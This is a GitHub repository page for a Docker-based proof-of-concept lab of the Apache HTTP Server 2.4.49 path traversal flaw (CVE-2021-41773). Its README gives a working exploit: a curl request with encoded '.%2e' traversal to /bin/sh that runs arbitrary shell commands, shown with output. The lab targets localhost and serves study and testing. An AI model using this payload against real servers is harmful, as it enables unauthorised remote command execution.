Skip to content

Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)

License

Notifications You must be signed in to change notification settings

hbertsch/CVE-2021-41773

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-41773 vulnerability

Path traversal vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)

For educational purposes only

Test

Set up the PoC environment

$ docker run --rm -dit -p 8000:80 ghcr.io/hbertsch/cve-2021-41773

Option 2: Manual Build

$ docker build -t cve-2021-41773 . 
$ docker run --rm -dit -p 8000:80 cve-2021-41773

Confirm it works

Check whether the server is running

$ curl http://localhost:8000
# Result
<html><body><h1>It works!</h1></body></html>

Exploit

Send any command you want like this:

$curl 'http://127.0.0.1:8000/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'echo;ls'
# Result
bash
cat
chgrp
chmod
chown
cp
dash
date
dd
df
dir
dmesg
dnsdomainname
domainname
echo
egrep
false
fgrep
findmnt
grep
gunzip
gzexe
gzip
hostname
ln
login
...

References

About

Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Dockerfile 100.0%